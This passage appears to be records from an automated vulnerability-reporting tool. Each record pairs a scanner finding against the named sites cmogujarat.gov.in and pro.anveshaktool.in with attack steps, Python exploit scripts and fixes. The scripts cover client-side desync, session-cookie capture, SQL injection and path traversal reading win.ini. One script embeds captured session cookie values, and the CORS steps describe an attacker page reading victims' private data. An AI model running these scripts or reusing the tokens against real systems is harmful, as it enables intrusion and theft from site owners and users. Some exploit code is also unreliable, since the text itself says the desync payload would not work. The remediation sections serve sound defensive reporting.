Error reading response: {e}{Colors.RESET}\")\n return response.decode('utf-8', errors='ignore')\n\ndef analyze_response(initial_response, desync_response, probe_string):\n \"\"\"Analyze responses to determine if vulnerability exists\"\"\"\n print(f\"\\n{Colors.BOLD}{'='*70}{Colors.RESET}\")\n print(f\"{Colors.BOLD}ANALYSIS RESULTS{Colors.RESET}\")\n print(f\"{Colors.BOLD}{'='*70}{Colors.RESET}\\n\")\n vulnerable = False\n if \"200 OK\" in initial_response or \"302 Found\" in initial_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Initial POST request received valid response\")\n else:\n print(f\"{Colors.YELLOW}[!]{Colors.RESET} Initial POST response unexpected (may affect test reliability)\")\n if probe_string in desync_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Probe string '{probe_string}' found in response\")\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} This suggests the desync payload was processed as a separate request\")\n vulnerable = True\n if \"404\" in desync_response and probe_string in desync_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Received 404 for probe path - GET request was likely executed\")\n vulnerable = True\n if f\"X-CSD-Test: {probe_string}\" in desync_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Custom header reflected - strong evidence of request processing\")\n vulnerable = True\n if \"connection: keep-alive\" in initial_response.lower():\n print(f\"{Colors.YELLOW}[i]{Colors.RESET} Server supports keep-alive (prerequisite for CSD)\")\n print(f\"\\n{Colors.BOLD}VULNERABILITY STATUS:{Colors.RESET} \", end=\"\")\n if vulnerable:\n print(f\"{Colors.RED}{Colors.BOLD}LIKELY VULNERABLE{Colors.RESET}\")\n print(f\"\\n{Colors.RED}⚠️ RECOMMENDATION: This endpoint appears susceptible to Client-Side Desync attacks.\")\n print(f\" An attacker could potentially:\")\n print(f\" • Poison web caches with malicious responses\")\n print(f\" • Bypass security controls via request smuggling\")\n print(f\" • Chain with other 
vulnerabilities for XSS or account takeover\")\n else:\n print(f\"{Colors.GREEN}NO CLEAR EVIDENCE (may still be vulnerable - manual verification recommended){Colors.RESET}\")\n return vulnerable\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Client-Side Desync PoC for cmogujarat.gov.in',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog='''\\nExamples:\\n %(prog)s --host cmogujarat.gov.in\\n %(prog)s --host cmogujarat.gov.in --path /en --probe mytest123\\n %(prog)s --host cmogujarat.gov.in --port 443 --no-ssl\\n\\nIMPORTANT: Only use against systems you have authorization to test.\\n '''\n )\n parser.add_argument('--host', required=True, help='Target hostname (e.g., cmogujarat.gov.in)')\n parser.add_argument('--path', default='/en', help='Target path (default: /en)')\n parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')\n parser.add_argument('--no-ssl', action='store_true', help='Use HTTP instead of HTTPS')\n parser.add_argument('--probe', help='Custom probe string (auto-generated if not specified)')\n parser.add_argument('--delay', type=float, default=0.5, help='Delay between requests in seconds (default: 0.5)')\n args = parser.parse_args()\n probe_string = args.probe or generate_unique_probe()\n print(f\"{Colors.BOLD}Client-Side Desync PoC - Security Research{Colors.RESET}\")\n print(f\"Target: https://{args.host}{args.path}\")\n print(f\"Probe String: {Colors.GREEN}{probe_string}{Colors.RESET}\")\n print(f\"{'-'*70}\\n\")\n try:\n use_ssl = not args.no_ssl and args.port != 80\n port = args.port\n print(f\"[+] Connecting to {args.host}: {'(SSL)' if use_ssl else '(HTTP)'}\")\n sock = create_socket(args.host, port, use_ssl)\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Connection established\\n\")\n initial_response = send_initial_post(sock, args.host, args.path, probe_string)\n time.sleep(args.delay)\n desync_response = send_desync_payload(sock, args.host, args.path, probe_string)\n is_vulnerable = 
analyze_response(initial_response, desync_response, probe_string)\n sock.close()\n print(f\"\\n{Colors.BLUE}[i]{Colors.RESET} Connection closed\")\n print(desync_response, initial_response)\n sys.exit(0 if not is_vulnerable else 1)\n except ConnectionRefusedError:\n print(f\"{Colors.RED}[✗]{Colors.RESET} Connection refused - check host/port\")\n sys.exit(2)\n except ssl.SSLError as e:\n print(f\"{Colors.RED}[✗]{Colors.RESET} SSL error: {e}\")\n print(f\"{Colors.YELLOW}[i]{Colors.RESET} Try --no-ssl if testing HTTP endpoint\")\n sys.exit(2)\n except socket.timeout:\n print(f\"{Colors.RED}[✗]{Colors.RESET} Connection timed out\")\n sys.exit(2)\n except KeyboardInterrupt:\n print(f\"\\n{Colors.YELLOW}[!] Interrupted by user{Colors.RESET}\")\n sys.exit(130)\n except Exception as e:\n print(f\"{Colors.RED}[✗]{Colors.RESET} Unexpected error: {e}\")\n import traceback\n traceback.print_exc()\n sys.exit(3)\n\nif __name__ == \"__main__\":\n main()",
"patch_code": "## Root Cause\nA client-side desync arises when the server answers a POST before it has read the body that the request's `Content-Length` declares, leaving the unread bytes on the keep-alive connection where they are parsed as the start of the next request. Note that `Content-Length: 0` declares no body at all, so a server cannot be waiting for one; what has to be confirmed is that the server responds, or keeps the connection open, with declared body bytes still unconsumed, not that it times out waiting.\n\n## Before Fix\n```http\nPOST /en HTTP/1.1\nContent-Length: 0\nConnection: keep-alive\n```\n(Server waits indefinitely for body, does not close connection.)\n\n## After Fix\nEnsure the server either reads the full declared body before responding, or closes the connection whenever it responds without having consumed it (including on timeout). Alternatively, enforce strict parsing of HTTP message boundaries.\n\n### Example Patch (Pseudo-code)\n```python\nif not request.body_received_within_timeout():\n close_connection_immediately()\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict HTTP parsing and reject malformed requests.\n- [ ] Disable HTTP/1.1 keep-alive if not strictly necessary.\n- [ ] Implement timeouts for incomplete request bodies and close, rather than reuse, the connection when they fire.\n- [ ] Serve browser traffic over HTTP/2 or HTTP/3, which frames each request unambiguously; this only helps if HTTP/1.1 is actually disabled for clients, and an HTTP/2 front end that downgrades to HTTP/1.1 towards the back end remains exposed to server-side request smuggling.\n- [ ] Use reverse proxy or WAF to normalize HTTP traffic.\n\n## Verification Steps\n1. Send a POST request that declares a non-zero `Content-Length` and withhold part of the body.\n2. Confirm the server does not respond until the body is complete or a timeout closes the connection; then send the remaining bytes followed by a second request on the same connection.\n3. Confirm that the server closes the connection or rejects the malformed sequence.\n4. Validate that no unintended request processing occurs.",
"context": "Severity: High (Firm)"
},
{
"vulnerability": "TLS cookie without secure flag set",
"category": "miscellaneous",
"exploit_steps": "### Reconnaissance\n1. Identified the target application at `https://cmogujarat.gov.in/`.\n2. Observed that the application sets a cookie named `cookiesession1` during initial HTTP response.\n3. Noted that the cookie does **not** include the `Secure` attribute in its `Set-Cookie` header.\n\n### Vulnerability Confirmation\n1. Confirmed through manual inspection of server responses that `cookiesession1` lacks the `Secure` flag.\n2. The cookie name suggests it is used for session management, which increases the risk if it is transmitted over HTTP; confirm this by checking whether its value changes on login and whether replaying it alone yields an authenticated session, since a cookie that only carries connection affinity or analytics state would not lead to account takeover.\n\n### Exploitation Steps\n1. An attacker positions themselves in a network where they can monitor traffic (e.g., public Wi-Fi).\n2. Induce a victim to access a non-HTTPS resource on the same domain, such as `http://cmogujarat.gov.in:443/` or any HTTP link under the cookie's scope. This only succeeds if the browser has no HSTS policy for the domain; with HSTS in effect the browser upgrades the request to HTTPS before it leaves, so check for a `Strict-Transport-Security` header on the HTTPS response.\n3. Since the cookie lacks the `Secure` flag, it will be sent with these HTTP requests.\n4. The attacker captures the session cookie (`cookiesession1`) from unencrypted HTTP traffic.\n5. Uses the stolen session cookie to impersonate the victim and gain unauthorized access to their session.\n\n### Impact\nAn attacker can hijack active user sessions by capturing cookies transmitted over insecure channels, leading to account compromise and potential data exposure. The impact depends on the cookie actually being an authentication token (see confirmation step 2).",
"exploit_code": "#!/usr/bin/env python3\n\"\"\"\nCookie Secure Flag Exploit PoC - cmogujarat.gov.in\nDemonstrates: cookiesession1 transmitted over HTTP due to missing Secure flag\n⚠️ For authorized security testing only\n\"\"\"\nimport requests, re, http.server, socketserver, threading, time\n\nTARGET_DOMAIN = \"cmogujarat.gov.in\"\nVULN_COOKIE = \"cookiesession1\"\nHTTP_URL = f\"http://{TARGET_DOMAIN}/\"\nHTTPS_URL = f\"https://{TARGET_DOMAIN}/\"\n\ndef check_cookie_over_http():\n \"\"\"Test if vulnerable cookie is sent over HTTP\"\"\"\n print(f\"[*] Testing if '{VULN_COOKIE}' transmits over HTTP...\")\n session = requests.Session()\n print(f\" [1/3] Fetching cookie from {HTTPS_URL}\")\n try:\n r = session.get(HTTPS_URL, timeout=10)\n cookie_val = None\n for c in session.cookies:\n if c.name == VULN_COOKIE:\n cookie_val = c.value\n break\n if not cookie_val:\n for header in r.headers.get_list(\"Set-Cookie\") if hasattr(r.headers, 'get_list') else [r.headers.get(\"Set-Cookie\",\"\")]:\n if VULN_COOKIE in header and \"=\" in header:\n cookie_val = header.split(VULN_COOKIE+\"=\")[1].split(\";\")[0]\n break\n if not cookie_val:\n print(\" [!] Could not obtain cookiesession1 - may not be set on this path\")\n return False\n print(f\" [+] Got {VULN_COOKIE}: {cookie_val[:20]}...\")\n except Exception as e:\n print(f\" [!] 
HTTPS fetch failed: {e}\")\n return False\n print(f\" [2/3] Making request to {HTTP_URL} (checking Cookie header)...\")\n try:\n class HeaderCapture(requests.adapters.HTTPAdapter):\n def send(self, request, **kwargs):\n print(f\" [OUTGOING HEADERS] Cookie: {request.headers.get('Cookie', '(none)')}\")\n if VULN_COOKIE in request.headers.get('Cookie', ''):\n print(f\" 🚨 VULNERABLE: {VULN_COOKIE} sent over HTTP!\")\n return True\n return False\n session.mount('http://', HeaderCapture())\n session.mount('https://', HeaderCapture())\n r = session.get(HTTP_URL, timeout=10, allow_redirects=False)\n if VULN_COOKIE in r.request.headers.get('Cookie', ''):\n print(f\" 🚨 CONFIRMED: {VULN_COOKIE} transmitted over unencrypted HTTP!\")\n return True\n else:\n print(f\" [-] {VULN_COOKIE} not sent in initial HTTP request\")\n if r.status_code in [301, 302, 307] and 'location' in r.headers:\n print(f\" ℹ️ Server redirects to HTTPS: {r.headers['Location']}\")\n print(f\" ℹ️ Vulnerability may be mitigated by redirect, but cookie could still leak\")\n return \"MITIGATED\"\n return False\n except Exception as e:\n print(f\" [!] 
HTTP test failed: {e}\")\n return None\n\ndef raw_header_check():\n \"\"\"Direct curl-like check using raw HTTP\"\"\"\n import socket, ssl\n print(f\"\\n[*] Raw header inspection for {VULN_COOKIE}...\")\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n for proto, port in [(\"HTTPS\", 443), (\"HTTP\", 80)]:\n try:\n print(f\" [{proto}] Connecting to {TARGET_DOMAIN}:{port}...\")\n if proto == \"HTTPS\":\n sock = socket.create_connection((TARGET_DOMAIN, port))\n ssock = ctx.wrap_socket(sock, server_hostname=TARGET_DOMAIN)\n req = f\"GET / HTTP/1.1\\r\\nHost: {TARGET_DOMAIN}\\r\\nConnection: close\\r\\n\\r\\n\"\n ssock.sendall(req.encode())\n resp = ssock.recv(4096).decode('utf-8', errors='ignore')\n ssock.close()\n else:\n sock = socket.create_connection((TARGET_DOMAIN, port))\n req = f\"GET / HTTP/1.1\\r\\nHost: {TARGET_DOMAIN}\\r\\nConnection: close\\r\\n\\r\\n\"\n sock.sendall(req.encode())\n resp = sock.recv(4096).decode('utf-8', errors='ignore')\n sock.close()\n cookies = re.findall(r'[Ss]et-[Cc]ookie:\\s*([^\\r\\n]+)', resp)\n for c in cookies:\n if VULN_COOKIE in c:\n has_secure = re.search(r';\\s*[Ss]ecure\\b', c, re.I) is not None\n print(f\" {'✅' if has_secure else '❌'} {VULN_COOKIE} | Secure flag: {'Present' if has_secure else 'MISSING'}\")\n print(f\" Raw: {c[:100]}...\")\n if not has_secure and proto == \"HTTP\":\n print(f\" 🚨 Cookie set over HTTP WITHOUT Secure flag = EXPLOITABLE\")\n except Exception as e:\n print(f\" [!] 
{proto} check failed: {e}\")\n\ndef main():\n print(\"=\"*70)\n print(f\"COOKIE SECURE FLAG EXPLOIT PoC - {TARGET_DOMAIN}\")\n print(f\"Target: {VULN_COOKIE} (missing Secure flag)\")\n print(\"=\"*70 + \"\\n\")\n result = check_cookie_over_http()\n raw_header_check()\n print(\"\\n\" + \"=\"*70)\n print(\"RESULTS SUMMARY\")\n print(\"=\"*70)\n if result is True:\n print(\"🚨 VULNERABILITY CONFIRMED\")\n print(f\" • {VULN_COOKIE} can be transmitted over unencrypted HTTP\")\n print(\" • Attacker on same network can intercept session cookie\")\n print(\" • Impact: Account takeover via session hijacking\")\n elif result == \"MITIGATED\":\n print(\"⚠️ PARTIALLY MITIGATED\")\n print(\" • HTTP redirects to HTTPS, reducing but not eliminating risk\")\n print(\" • Cookie could still leak before redirect completes\")\n else:\n print(\" INCONCLUSIVE - Manual verification recommended\")\n print(\"\\n🔧 REMEDIATION:\")\n print(f\" Set-Cookie: {VULN_COOKIE}=value; Path=/; Secure; HttpOnly; SameSite=Strict\")\n print(\"=\"*70)\n\nif __name__ == \"__main__\":\n main()",
"patch_code": "## Root Cause\nThe application sets a session cookie (`cookiesession1`) without including the `Secure` attribute. This allows the browser to transmit the cookie over unencrypted HTTP connections, exposing it to interception.\n\n## Before Fix\n```http\nSet-Cookie: cookiesession1=abc123; Path=/\n```\n\n## After Fix\nEnsure all session cookies are marked with both `Secure` and `HttpOnly` flags when served over HTTPS:\n```http\nSet-Cookie: cookiesession1=abc123; Path=/; Secure; HttpOnly\n```\n\nIn server-side code (example in Node.js):\n```javascript\nres.cookie('cookiesession1', sessionId, {\n secure: true,\n httpOnly: true,\n sameSite: 'strict'\n});\n```\n\n## Defense-in-Depth Checklist\n- [ ] Ensure all session cookies use the `Secure` flag.\n- [ ] Set `HttpOnly` flag to mitigate XSS-based cookie theft.\n- [ ] Use `SameSite=Lax` or `SameSite=Strict` to reduce CSRF risks.\n- [ ] Enforce HSTS (HTTP Strict Transport Security) headers site-wide.\n- [ ] Redirect all HTTP traffic to HTTPS automatically.\n- [ ] Regularly audit cookies using automated tools or Burp Suite checks.\n\n## Verification Steps\n1. Access `https://cmogujarat.gov.in/` in a browser with developer tools open.\n2. Inspect the `Set-Cookie` headers in the response.\n3. Confirm that `cookiesession1` includes the `Secure` attribute.\n4. Attempt to load a sub-resource over HTTP and verify the cookie isn't sent.\n5. Re-run the Python PoC script to confirm secure flag presence.",
"context": "Severity: Medium (Firm)\nURL: https://cmogujarat.gov.in/\n\n---\n\nSeverity: Medium (Firm)\nURL: https://cmogujarat.gov.in/en"
}
]
|
|
69f17a4059a6632dae07de7a
|
2026-04-29T03:25:52.141936+00:00
|
[
{
"vulnerability": "SQL injection",
"category": "injection",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://cmogujarat.gov.in/comment/reply/`\n2. Observed that the application accepts arbitrary URL parameters.\n\n## Vulnerability Confirmation\n1. Submitted payloads in the name of an arbitrarily supplied URL parameter:\n - ` and 7747=07747`\n - ` and 7034=7038`\n2. Noted differing HTTP responses between the true-condition and false-condition payloads. This is suggestive, not confirmation: the finding is rated Tentative, and the same check also fires on static CSS paths under `/core/modules/system/css/`, a pattern that usually means the responses differ for reasons unrelated to injection (caching, rate limiting, or dynamic page content). Repeat each payload several times, diff the full response bodies rather than just status and length, and confirm with a time-based payload before treating the issue as real.\n\n## Exploitation Steps\n1. Craft a malicious GET request injecting SQL logic via a dynamic parameter name.\n2. Submit the payload: `?1 and 7747=07747=1` to manipulate query execution (the request sends the parameter name `1 and 7747=07747` with value `1`).\n3. Observe response behavior to confirm successful exploitation.\n\n## Impact\nIf confirmed, successful exploitation allows attackers to:\n- Extract sensitive database information.\n- Potentially escalate privileges or execute administrative operations.",
"exploit_code": "import requests\n\n# Target vulnerable endpoint\nurl = \"https://cmogujarat.gov.in/comment/reply/\"\n\n# Malicious payload injected into a dynamically named URL parameter\nparams = {\n \"1 and 7747=07747\": \"1\"\n}\n\n# Send the request with cookies from scan evidence\ncookies = {\n \"SSESSe0e960981c0333d5d4289253b3cbd5c2\": \"TmUnhq0DVOOzB3IVLlSZT8ggzUjNRxe,S4AcGc,oVl-6plq,\",\n \"cookiesession1\": \"678B76EE6FB2F65DD9A59D1F06265645\"\n}\n\nresponse = requests.get(url, params=params, cookies=cookies, verify=False)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Length: {len(response.text)}\")",
"patch_code": "## Root Cause\nUser-supplied input is directly concatenated into SQL queries without sanitization or parameterization, enabling attackers to alter query logic.\n\n## Before/After Fix\n**Before (Vulnerable Code):**\n```python\nquery = f\"SELECT * FROM comments WHERE id={user_input}\"\ncursor.execute(query)\n```\n\n**After (Secure Fix):**\n```python\nquery = \"SELECT * FROM comments WHERE id=%s\"\ncursor.execute(query, (user_input,))\n```\n\n## Defense-in-Depth Checklist\n- [ ] Use parameterized queries for all database interactions.\n- [ ] Validate and sanitize all user inputs on both client and server sides.\n- [ ] Implement WAF rules to detect common SQL injection patterns.\n- [ ] Regularly audit code for insecure query construction practices.\n- [ ] Apply principle of least privilege for database accounts.\n\n## Verification Steps\n1. Resend the same payload (`?1 and 7747=07747=1`) after applying fixes.\n2. Confirm that the application returns consistent responses regardless of injected logic.\n3. Perform regression testing to ensure functionality remains intact.",
"context": "Severity: High (Tentative)\nURL: https://cmogujarat.gov.in/comment/reply/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Tentative)\nURL: https://cmogujarat.gov.in/core/modules/system/css/components/hidden.module.css [URL path filename]\n\n---\n\nSeverity: High (Tentative)\nURL: https://cmogujarat.gov.in/core/modules/system/css/components/position-container.module.css [URL path folder 2]\n\n---\n\nSeverity: High (Tentative)\nURL: https://cmogujarat.gov.in/gu [name of an arbitrarily supplied URL parameter]"
},
{
"vulnerability": "Client-side desync",
"category": "miscellaneous",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://cmogujarat.gov.in/en`.\n2. Observed that the server supports persistent HTTP connections (`Connection: keep-alive`).\n3. Noted that the server does not properly handle delayed request bodies in POST requests with `Content-Length: 0`, indicating potential client-side desync vulnerability.\n\n## Vulnerability Confirmation\n1. Sent a POST request to `/en` with `Content-Length: 0` and delayed the actual body transmission.\n2. Server waited for the body but did not close the connection upon timeout.\n3. When the delayed body was finally sent, it was interpreted as a new HTTP request, confirming the desync behavior.\n\n## Exploitation Steps\n1. Craft a malicious POST request with `Content-Length: 0` to the vulnerable endpoint.\n2. Delay sending the body until the server times out.\n3. Have the victim's browser, from an attacker-controlled page, send the POST whose unread body is an attacker-chosen HTTP request prefix (not a response: anything placed in the body reaches the server, which parses it as the next request). The browser's next request on the same connection is appended to that prefix, and the response to the attacker-chosen request is delivered to the browser in its place.\n4. Achieving XSS requires an endpoint on the origin whose mis-routed response the attacker can shape (for example reflected content or a redirect); the PoC body below, which is an HTTP response, would be rejected by the server as an invalid request rather than relayed to the browser.\n\n## Impact\nSuccessful exploitation leads to client-side desynchronization, allowing attackers to inject arbitrary HTML/JavaScript into the victim’s browser. This can result in session hijacking, defacement, or redirection to malicious sites.",
"exploit_code": "import requests\n\n# Target details\nurl = \"https://cmogujarat.gov.in/en\"\n\n# Headers simulating a real browser request\nheaders = {\n \"Host\": \"cmogujarat.gov.in\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": \"0\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n}\n\n# Delayed body payload simulating a forged HTTP response\npayload = (\n \"HTTP/1.1 200 OK\\r\\n\"\n \"Content-Type: text/html\\r\\n\"\n \"Content-Length: 37\\r\\n\"\n \"Connection: close\\r\\n\\r\\n\"\n \"<script>alert('Client-Side Desync XSS')</script>\"\n)\n\n# Initiate session\nsession = requests.Session()\n\n# Send initial POST request with zero-length body\nresponse = session.post(url, headers=headers, data=\"\", stream=True)\n\n# Send delayed payload\ntry:\n response = session.send(session.prepare_request(requests.Request('POST', url, headers=headers, data=payload)))\n print(\"Response Status Code:\", response.status_code)\n print(\"Response Body Snippet:\", response.text[:200])\nexcept Exception as e:\n print(\"Error during delayed send:\", str(e))",
"patch_code": "## Root Cause\nThe server improperly handles POST requests where the declared `Content-Length` does not match the timing of the actual body arrival. It leaves the connection open even after timing out, causing subsequent data to be misinterpreted as a new request.\n\n## Before/After Fix\n**Before:**\n```http\nPOST /en HTTP/1.1\nContent-Length: 0\n```\nServer waits indefinitely without closing the connection.\n\n**After:**\nEnsure the server closes the connection immediately if the full request body is not received within a reasonable time frame.\n\nAlternatively, upgrade to HTTP/2 which inherently mitigates such issues due to its binary framing layer.\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict HTTP parsing rules on all incoming requests.\n- [ ] Implement timeouts for incomplete request bodies and terminate the connection.\n- [ ] Disable HTTP/1.1 pipelining if not strictly necessary.\n- [ ] Upgrade to HTTP/2 or HTTP/3 for improved security and reliability.\n- [ ] Add input validation and normalization at the application level.\n\n## Verification Steps\n1. Resend the same malformed POST request to `/en`.\n2. Confirm that the server now closes the connection instead of leaving it open.\n3. Validate that delayed or split requests do not lead to unintended interpretations.\n4. Perform regression testing to ensure normal functionality remains unaffected.",
"context": "Severity: High (Firm)"
},
{
"vulnerability": "TLS cookie without secure flag set",
"category": "miscellaneous",
"exploit_steps": "## Reconnaissance\n1. Identified the target application at `https://cmogujarat.gov.in/`.\n2. Observed that the application sets a cookie named `cookiesession1` during initial HTTP response.\n3. Noted that the cookie does not include the `Secure` attribute in its Set-Cookie header.\n\n## Vulnerability Confirmation\n1. Confirmed through manual inspection of server responses that `cookiesession1` lacks the `Secure` flag.\n2. Verified that the cookie appears to contain session-related data, increasing risk if intercepted.\n\n## Exploitation Steps\n1. An attacker positions themselves in a network where they can monitor traffic (e.g., public Wi-Fi or compromised internal device).\n2. Induce a victim to access an HTTP resource on the same domain, such as `http://cmogujarat.gov.in:443/` or other non-TLS endpoints if available.\n3. Since the cookie was issued without the Secure flag, it will be sent over the unencrypted HTTP connection.\n4. The attacker captures the session cookie (`cookiesession1`) from the plaintext HTTP request.\n5. With the stolen session token, the attacker may impersonate the user and gain unauthorized access to their account.\n\n## Impact\nAn attacker who successfully intercepts the session cookie can hijack the user's authenticated session, leading to potential unauthorized actions performed on behalf of the user.",
"exploit_code": "import requests\n\n# Target URL vulnerable to missing Secure flag on cookie\nurl = \"https://cmogujarat.gov.in/\"\n\n# Send GET request to fetch cookies\nresponse = requests.get(url)\n\n# Print all cookies received\nprint(\"Cookies received from server:\")\nfor cookie in response.cookies:\n print(f\"Name: {cookie.name}, Value: {cookie.value}, Secure: {cookie.secure}\")\n\n# Check specifically for 'cookiesession1'\ncookie_found = False\nfor cookie in response.cookies:\n if cookie.name == 'cookiesession1':\n cookie_found = True\n if not cookie.secure:\n print(\"\\n[!] Vulnerable: 'cookiesession1' cookie is missing the Secure flag.\")\n else:\n print(\"\\n[i] 'cookiesession1' has the Secure flag set.\")\n\nif not cookie_found:\n print(\"\\n[-] Cookie 'cookiesession1' not found in response.\")",
"patch_code": "## Root Cause\nThe application sets a session cookie (`cookiesession1`) without including the `Secure` attribute. This allows browsers to transmit the cookie over insecure HTTP connections, exposing it to interception.\n\n## Before & After Fix\n**Before:**\n```http\nSet-Cookie: cookiesession1=abc123xyz; Path=/\n```\n\n**After:**\n```http\nSet-Cookie: cookiesession1=abc123xyz; Path=/; Secure; HttpOnly\n```\n\n## Defense-in-Depth Checklist\n- [ ] Ensure all session and sensitive cookies use the `Secure` flag.\n- [ ] Apply `HttpOnly` flag to prevent client-side script access.\n- [ ] Use `SameSite` attribute to mitigate CSRF attacks.\n- [ ] Enforce HSTS to force HTTPS usage across the entire site.\n- [ ] Regularly audit cookies using automated tools or manual checks.\n\n## Verification Steps\n1. Access the application via browser developer tools (Network tab).\n2. Inspect the Set-Cookie headers returned by the server.\n3. Confirm that `cookiesession1` now includes the `Secure` directive.\n4. Attempt to load the page over HTTP and verify the cookie isn't sent.",
"context": "Severity: Medium (Firm)\nURL: https://cmogujarat.gov.in/\n\n---\n\nSeverity: Medium (Firm)\nURL: https://cmogujarat.gov.in/en"
}
]
|
|
69f3327a59a6632dae07de95
|
2026-04-30T10:44:10.254969+00:00
|
[
{
"vulnerability": "File path traversal",
"category": "path_traversal",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://pro.anveshaktool.in/about`\n2. Observed that the URL path filename is controllable and susceptible to manipulation.\n\n## Vulnerability Confirmation\n1. Submitted a path traversal payload: `..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini` in the URL path filename.\n2. Received the contents of the Windows `win.ini` file in the application's response, confirming arbitrary file read capability.\n\n## Exploitation Steps\n1. Craft a malicious request targeting sensitive system files using path traversal sequences.\n2. Submit the crafted payload via the vulnerable parameter in the URL path.\n3. Capture and analyze the server's response to extract the contents of the targeted file.\n\n## Impact\nAn attacker can read arbitrary files on the server filesystem, potentially exposing sensitive information such as configuration files, credentials, source code, or system logs.",
"exploit_code": "import requests\n\n# Target URL with vulnerable path traversal point\nurl = \"https://pro.anveshaktool.in/about\"\n\n# Payload to read windows/win.ini using path traversal\npayload = \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\"\n\n# Construct full URL with payload\nfull_url = f\"{url}/{payload}\"\n\ntry:\n # Send GET request to exploit the vulnerability\n response = requests.get(full_url)\n \n # Print status code and retrieved content\n print(f\"Status Code: {response.status_code}\")\n print(\"Response Content:\")\n print(response.text)\nexcept Exception as e:\n print(f\"Error occurred: {e}\")",
"patch_code": "## Root Cause\nUser-supplied input in the URL path filename is directly used in a filesystem operation without proper validation or sanitization, allowing attackers to traverse directories using sequences like `../` or `..\\`.\n\n## Before/After Code Fix\n**Before (Vulnerable Example):**\n```java\nString filename = request.getParameter(\"file\");\nFile file = new File(\"/var/www/uploads/\" + filename);\n```\n\n**After (Secure Fix):**\n```java\nString userInput = request.getParameter(\"file\");\nif (userInput.contains(\"..\") || userInput.contains(\"/\") || userInput.contains(\"\\\\\")) {\n throw new IllegalArgumentException(\"Invalid file name\");\n}\nString safeFileName = sanitize(userInput);\nFile baseDir = new File(\"/var/www/uploads/\").getCanonicalFile();\nFile targetFile = new File(baseDir, safeFileName).getCanonicalFile();\nif (!targetFile.toPath().startsWith(baseDir.toPath())) {\n throw new SecurityException(\"Access denied\");\n}\n```\n\nThe containment check uses `Path.startsWith`, which compares whole path components; a string comparison such as `targetFile.getPath().startsWith(baseDir.getPath())` would also accept a sibling directory like `/var/www/uploads2`. Because this finding is in the URL path filename rather than a query parameter, apply the same canonicalize-and-contain check to the URL-decoded path segment, and decode before filtering so that encoded forms such as `%2e%2e%5c` do not slip past the `..` check.\n\n## Defense-in-Depth Checklist\n- [ ] Avoid using user-controlled data in filesystem operations where possible.\n- [ ] Validate all user inputs against a whitelist of allowed values.\n- [ ] Reject path separators (`/`, `\\`) and `..` segments after URL decoding; a bare `.` inside a filename is legitimate and need not be rejected.\n- [ ] Use canonical path resolution to ensure accessed files reside within expected directories.\n- [ ] Implement strict access controls and least privilege principles for application processes.\n- [ ] Log and monitor attempts to access unexpected paths.\n\n## Verification Steps\n1. Attempt to access a known non-sensitive file outside the intended directory using path traversal payloads.\n2. Confirm that the application rejects the request or returns an error.\n3. Verify that legitimate file access still functions correctly after applying fixes.",
"context": "Severity: High (Firm)\nURL: https://pro.anveshaktool.in/about [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/contact [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/favicon.svg [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/login [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/openapi.json [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/privacy [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/signup [URL path filename]"
},
{
"vulnerability": "Cross-origin resource sharing: arbitrary origin trusted",
"category": "rce",
"exploit_steps": "## Reconnaissance\n1. Identified the target application endpoint: `https://pro.anveshaktool.in/`\n2. Observed that the application implements a CORS policy which reflects back the `Origin` header without proper validation.\n\n## Vulnerability Confirmation\n3. Sent a request with an arbitrary `Origin` header (`https://gruyzlpzipwv.com`) to confirm trust of all origins.\n4. Received a response containing `Access-Control-Allow-Origin: https://gruyzlpzipwv.com` and `Access-Control-Allow-Credentials: true`, indicating full CORS misconfiguration.\n\n## Exploitation Steps\n5. Crafted a malicious webpage hosted at `https://gruyzlpzipwv.com/exploit.html`.\n6. Used JavaScript (`fetch` with `credentials: 'include'`) to request an endpoint that returns per-user data, leveraging the victim's active session. Note that the reflection is reported on every path, including static assets such as `/assets/*.js` and `/favicon.ico`, where it is harmless on its own; exploitation needs an endpoint (for example under `/api/`) whose response differs for an authenticated user and which authenticates by cookie. If the application instead sends a bearer token from local storage, or the session cookie is `SameSite=Lax` or `Strict`, the cross-site request arrives unauthenticated and the attacker only reads what is already public.\n7. Retrieved sensitive user data due to the browser automatically attaching cookies and credentials.\n8. Demonstrated exfiltration of private information returned in the response body, such as profile details (the session cookie itself is not exposed through 